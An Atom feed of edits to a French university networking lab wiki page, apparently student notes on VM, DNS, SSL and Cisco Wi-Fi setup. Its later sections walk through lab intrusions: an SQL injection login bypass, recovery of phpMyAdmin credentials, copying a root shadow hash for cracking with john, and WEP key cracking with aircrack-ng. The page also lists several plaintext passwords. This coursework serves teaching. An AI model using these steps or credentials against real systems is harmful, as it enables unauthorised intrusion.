<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nekhlas-</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Nekhlas-"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Nekhlas-"/>
		<updated>2026-05-13T09:33:37Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54503</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54503"/>
				<updated>2020-12-14T14:20:41Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Sécurisation par certificat SSL */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
 www      IN      CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Puis ajouter dans newaliases&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Installation de mailx pour lire les mails reçus&lt;br /&gt;
 apt-install bsd-mailx&lt;br /&gt;
Pour consulter le mail de vérification&lt;br /&gt;
 mailx admin&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation par certificat SSL ===&lt;br /&gt;
&lt;br /&gt;
Génération du CSR à l'aide d'openssl&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr&lt;br /&gt;
&lt;br /&gt;
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt&lt;br /&gt;
&lt;br /&gt;
Configuration du serveur apache2&lt;br /&gt;
&lt;br /&gt;
Activation du ssl sur apache2 &lt;br /&gt;
 ae2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                                                         &lt;br /&gt;
  ServerName www.girolle.site                                                                                             &lt;br /&gt;
  Redirect / https://www.girolle.site       &lt;br /&gt;
  ....                                                                        &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.182:443&amp;gt;&lt;br /&gt;
     DocumentRoot /var/www/html2&lt;br /&gt;
     ServerName girolle.site&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/girolle.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/girolle.site.key&lt;br /&gt;
         SSLCertificateChainFile /root/GandiCA.pem&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
verifications:&lt;br /&gt;
 host -t soa girolle.site ns6.gandi.net&lt;br /&gt;
 Sur Zabeth : host www.girolle.site&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
 $dbport='3306';&lt;br /&gt;
 $dbtype='mysql';&lt;br /&gt;
&lt;br /&gt;
on reccupere user et mdp pour acceder a la page http://honey.plil.info/phpmyadmin/ &lt;br /&gt;
connexion id : root&lt;br /&gt;
mdp: gencovid19&lt;br /&gt;
&lt;br /&gt;
une fois connecter on recherche les identifiants des utilisateurs ssh :&lt;br /&gt;
id = rex &lt;br /&gt;
mdp: &lt;br /&gt;
&lt;br /&gt;
connexion ssh : ssh rex@honey.plil.info&lt;br /&gt;
 /etc/shadow pour trouver la cle de cryptage du mdp root &lt;br /&gt;
 copier la cle et la mettre dans un fichier (exemple :temp): root:$6$yCvXnJp4SOQwQaxV$vRYUr1fwU1SAPxZ0NbdIw/03ypGXjjRjZKRfX3sa7T2v9XnbI4xG.EyEtcrtASLlvqxuh9Hr6TrOB5Szopd6m/:18525:0:99999:7:::&lt;br /&gt;
 installation de john &lt;br /&gt;
 john nom du fichier&lt;br /&gt;
&lt;br /&gt;
pour aller plus rapidement creer un dictionnaire a partir des indices donnés  : motif doublé 'le mot de passe de root possède la même particularité que le mot de passe administrateur habituel des machines de projets'&lt;br /&gt;
utiliseer crunch?&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
&lt;br /&gt;
On utilise le paquet aircrack-ng.&lt;br /&gt;
&lt;br /&gt;
La commande&lt;br /&gt;
 airmon-ng&lt;br /&gt;
permet de voir le nom du réseau sans fil: wlan0mon&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On scanne les réseaux :&lt;br /&gt;
 airodump-ng --encrypte wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisi un réseau parmi ceux disponibles. Par exemple la cracotte08 est sur le canal 7 et a pour BSSID 04:DA:D2:9C:50:57.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep1.png|600px]]&lt;br /&gt;
&lt;br /&gt;
On lance avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng --write testwep --channel 7 --bssid 04:DA:D2:9C:50:57 wlan0mon&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -z testwep-01.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:capturewep2.png|600px]]&lt;/div&gt;</summary>
		<author><name>Nekhlas-</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54502</id>
		<title>TP sysres IMA5sc 2020/2021 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G7&amp;diff=54502"/>
				<updated>2020-12-14T14:20:29Z</updated>
		
		<summary type="html">&lt;p&gt;Nekhlas- : /* Sur la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Explication Infrastructure ==&lt;br /&gt;
&lt;br /&gt;
==Installation VM==&lt;br /&gt;
&lt;br /&gt;
Connexion ssh:&lt;br /&gt;
 ssh pifou@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
Commande (en root su -):&lt;br /&gt;
 xen-create-image --hostname=girolle --ip=100.64.0.24 --netmask=255.255.255.240 --dist=buster --dir=/usr/local/xen --password=glopglop --force&lt;br /&gt;
&amp;lt;br&amp;gt; MAJ gateway : 161&lt;br /&gt;
&amp;lt;br&amp;gt;Nom de domaine: girolle.site&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse IP : 100.64.0.24 MAJ: 193.48.57.172&lt;br /&gt;
&amp;lt;br&amp;gt;Netmask: 255.255.255.240 MAJ: 255.255.255.224&lt;br /&gt;
&amp;lt;br&amp;gt;Adresse MAC : 00:16:3E:3E:E3:15&lt;br /&gt;
&lt;br /&gt;
Repartition des volumes logiques : &lt;br /&gt;
 lvdisplay &lt;br /&gt;
 lvrename &lt;br /&gt;
&lt;br /&gt;
Dans le fichier de configuration de la machine : girolle.cfg&lt;br /&gt;
on rajoute var et home :&lt;br /&gt;
lignes 'phy:/.../xdva3'&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Commandes pour creer et acceder a la VM :&lt;br /&gt;
&lt;br /&gt;
 xl create -c etc/xen/girolle.cfg&lt;br /&gt;
 '''xl console girolle'''&lt;br /&gt;
&lt;br /&gt;
Commandes sur la vm: &lt;br /&gt;
&lt;br /&gt;
dans etc/fstab il faut indiquer les fonctionnalites de xvda3 et xvda4 &lt;br /&gt;
&lt;br /&gt;
au prealable il faut &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
1) formater la partition : &lt;br /&gt;
 mkfs -t ext4 /dev/xvda4&lt;br /&gt;
&lt;br /&gt;
2) Monter la partition que l'on veut sur /mnt &lt;br /&gt;
 mount /dev/xvda4 /mnt&lt;br /&gt;
3) Migrer tout le contenu de var dans mnt &lt;br /&gt;
 cd /var&lt;br /&gt;
 mv * /mnt&lt;br /&gt;
&lt;br /&gt;
4) Dans le fichier fstab rajouter :&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
5) Unmout mnt &lt;br /&gt;
 umount /mnt&lt;br /&gt;
&lt;br /&gt;
6) Monter tout sur dev/xdva&lt;br /&gt;
 mount -a &lt;br /&gt;
7)Verification &lt;br /&gt;
 df&lt;br /&gt;
 dpkg -l&lt;br /&gt;
&lt;br /&gt;
== Activation connexion ssh ==&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente la ligne PermissionRoot :  &lt;br /&gt;
 # Authentication:&lt;br /&gt;
 #LoginGraceTime 2m&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis on l'active avec la commande :&lt;br /&gt;
 service sshd restart&lt;br /&gt;
&lt;br /&gt;
On peut se connecter à la machine par ssh root@girolle.site (mot de passe root habituel)&lt;br /&gt;
&lt;br /&gt;
==Redirection DNS==&lt;br /&gt;
&lt;br /&gt;
=== Sur Gandi ===&lt;br /&gt;
&lt;br /&gt;
Achat d'un nom de domaine : girolle.site&lt;br /&gt;
Création d'un Glue Record : 193.48.57.182&lt;br /&gt;
&lt;br /&gt;
Serveur DNS primaire : ns1.girolle.site (193.48.57.182)&lt;br /&gt;
Serveur DNS secondaire : ns6.gandi.net (217.70.177.40)&lt;br /&gt;
&lt;br /&gt;
=== Sur la machine virtuelle ===&lt;br /&gt;
&lt;br /&gt;
Installation de bind9&lt;br /&gt;
On modifie les fichiers dans /etc/bind/named.conf.&lt;br /&gt;
Dans /etc/bind/named.conf.options&lt;br /&gt;
 options {&lt;br /&gt;
   directory &amp;quot;/etc/bind&amp;quot;;&lt;br /&gt;
   listen-on-v6 { any; };&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;girolle.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;girolle.site/girolle&amp;quot;;&lt;br /&gt;
   allow-transfer (217.70.177.40;};&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Dans db.girolle.site&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.girolle.site.  postmaster.girolle.site(&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.girolle.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.182&lt;br /&gt;
 @       IN      MX      100 girolle.site.&lt;br /&gt;
&lt;br /&gt;
 www      IN      CNAME   ns1&lt;br /&gt;
&lt;br /&gt;
Puis pour le relancer :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration pour la réception du mail de confirmation du certificat SSL&lt;br /&gt;
Installer Postfixe pour avoir accès au fichier aliases&lt;br /&gt;
 Internet Site&lt;br /&gt;
 girolle.site&lt;br /&gt;
&lt;br /&gt;
Dans /etc/aliases&lt;br /&gt;
 admin: root&lt;br /&gt;
&lt;br /&gt;
Puis ajouter dans newaliases&lt;br /&gt;
Cela va permettre de récupérer le mail de confirmation de Gandi envoyé à admin@girolle.site&lt;br /&gt;
&lt;br /&gt;
https://www.jeffgeerling.com/blogs/jeff-geerling/viewing-email-linux-using&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Installation de mailx pour lire les mails reçus&lt;br /&gt;
 apt-install bsd-mailx&lt;br /&gt;
Pour consulter le mail de vérification&lt;br /&gt;
 mailx admin&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation par certificat SSL ===&lt;br /&gt;
&lt;br /&gt;
Génération du CSR à l'aide d'openssl&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout girolle.site.key -out girolle.site.csr&lt;br /&gt;
&lt;br /&gt;
Réception du mail de vérification avec une URL et un mot de passe ce qui nous permet de récupérer le fichier girolle.site.crt&lt;br /&gt;
&lt;br /&gt;
Configuration du serveur apache2&lt;br /&gt;
&lt;br /&gt;
Activation du ssl sur apache2 &lt;br /&gt;
 ae2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ajout dans le fichier 000-default.conf dans /etc/apache2/sites-available&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                                                         &lt;br /&gt;
  ServerName www.girolle.site                                                                                             &lt;br /&gt;
  Redirect / https://www.girolle.site       &lt;br /&gt;
  ....                                                                        &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.182:443&amp;gt;&lt;br /&gt;
     DocumentRoot /var/www/html2&lt;br /&gt;
     ServerName girolle.site&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/girolle.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/girolle.site.key&lt;br /&gt;
         SSLCertificateChainFile /root/GandiCA.pem&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Configuration des bornes Wi-Fi ==&lt;br /&gt;
&lt;br /&gt;
Borne classique : Cisco - AIR-CAP1602I-E-K9&lt;br /&gt;
&lt;br /&gt;
Configuration IOS en CLI :&lt;br /&gt;
&lt;br /&gt;
aaa new-model&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
aaa group server radius radius_girolle&lt;br /&gt;
 server 193.48.57.182 auth-port 1812 acct-port 1813&lt;br /&gt;
!&lt;br /&gt;
aaa authentication login eap_group1 group radius_group1&lt;br /&gt;
aaa authentication login eap_girolle group radius_girolle&lt;br /&gt;
!         &lt;br /&gt;
dot11 ssid SSID_GIROLLE&lt;br /&gt;
   vlan 107&lt;br /&gt;
   authentication open eap eap_girolle &lt;br /&gt;
   authentication network-eap eap_girolle &lt;br /&gt;
   authentication key-management wpa&lt;br /&gt;
!&lt;br /&gt;
!&lt;br /&gt;
...&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
  encryption vlan 101 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
interface BVI1&lt;br /&gt;
 ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
!&lt;br /&gt;
radius-server host 193.48.57.182 auth-port 1812 acct-port 1813 key 7 09414A191B0A051C0E1B0D2C22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
10.60.100.10 : adresse IP fixe du point d'accès&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Commandes et verifications /&lt;br /&gt;
ap(config)#interface BVI1&lt;br /&gt;
ap(config-if)# ip address 10.60.100.10 255.255.255.0&lt;br /&gt;
ap(config-if)#exit&lt;br /&gt;
ap#write&lt;br /&gt;
PING ROUTEUR 1 POUR VERIFIER LA CONNEXION&lt;br /&gt;
ap#ping 10.60.100.2 &lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.2, timeout is 2 seconds:&lt;br /&gt;
.!!!!&lt;br /&gt;
Success rate is 80 percent (4/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
test second routeur : ne fonctionne pas car pas d'addresse ip&lt;br /&gt;
ap#ping 10.60.100.1&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 10.60.100.1, timeout is 2 seconds:&lt;br /&gt;
.....&lt;br /&gt;
Success rate is 0 percent (0/5)&lt;br /&gt;
&lt;br /&gt;
Configurer l'adresse par defaut:&lt;br /&gt;
&lt;br /&gt;
ap(config)#ip route 0.0.0.0 0.0.0.0 10.60.100.2&lt;br /&gt;
ap(config)#exit&lt;br /&gt;
ap#sh ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test ping notre machine virtuelle girolle : &lt;br /&gt;
ap#ping 193.48.57.182&lt;br /&gt;
Type escape sequence to abort.&lt;br /&gt;
Sending 5, 100-byte ICMP Echos to 193.48.57.182, timeout is 2 seconds:&lt;br /&gt;
!!!!!&lt;br /&gt;
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms&lt;br /&gt;
&lt;br /&gt;
==Configuration WLC==&lt;br /&gt;
&lt;br /&gt;
Utilisation de bornes Cisco 2802i&lt;br /&gt;
&lt;br /&gt;
Connection via minicom -os (9600 bauds)&lt;br /&gt;
&lt;br /&gt;
 enable &lt;br /&gt;
 capwap ap ip &amp;lt;ip&amp;gt; &amp;lt;netmask&amp;gt; &amp;lt;gateway&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Intrusion honey.plil.info ==&lt;br /&gt;
&lt;br /&gt;
pour avoir les identifiants de l'admin : ID = ' OR '1'='1 et MDP = ' OR '1'='1&lt;br /&gt;
&lt;br /&gt;
Admin : admin	jesuislechef	admin	Administrateur&lt;br /&gt;
&lt;br /&gt;
Creer le fichier  etc/phpmyadmin/config-db.php&lt;br /&gt;
en allant dans l'onglet: .... on telecharge le fichier qu'on a crée : &lt;br /&gt;
 &amp;lt;?php&lt;br /&gt;
 ##&lt;br /&gt;
 ## database access settings in php format&lt;br /&gt;
 ## automatically generated from /etc/dbconfig-common/phpmyadmin.conf&lt;br /&gt;
 ## by /usr/sbin/dbconfig-generate-include&lt;br /&gt;
 ##&lt;br /&gt;
 ## by default this file is managed via ucf, so you shouldn't have to&lt;br /&gt;
 ## worry about manual changes being silently discarded.  *however*,&lt;br /&gt;
 ## you'll probably also want to edit the configuration file mentioned&lt;br /&gt;
 ## above too.&lt;br /&gt;
 ##&lt;br /&gt;
 $dbuser='phpmyadmin';&lt;br /&gt;
 $dbpass='gencovid19';&lt;br /&gt;
 $basepath='';&lt;br /&gt;
 $dbname='phpmyadmin';&lt;br /&gt;
 $dbserver='localhost';&lt;br /&gt;
